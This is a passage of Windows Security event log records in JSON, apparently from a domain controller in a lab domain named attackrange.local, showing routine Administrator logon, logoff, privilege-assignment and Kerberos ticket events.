","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220538,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x793E3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x793e3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220539,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x793E3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x793e3","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220540,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220541,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220542,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220543,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7941F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7941f","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220544,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7941F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7941f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220545,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B787\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b787","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220546,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B4C4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b4c4","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220547,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7941F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7941f","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220548,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220549,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220550,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220551,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x795A2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x795a2","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
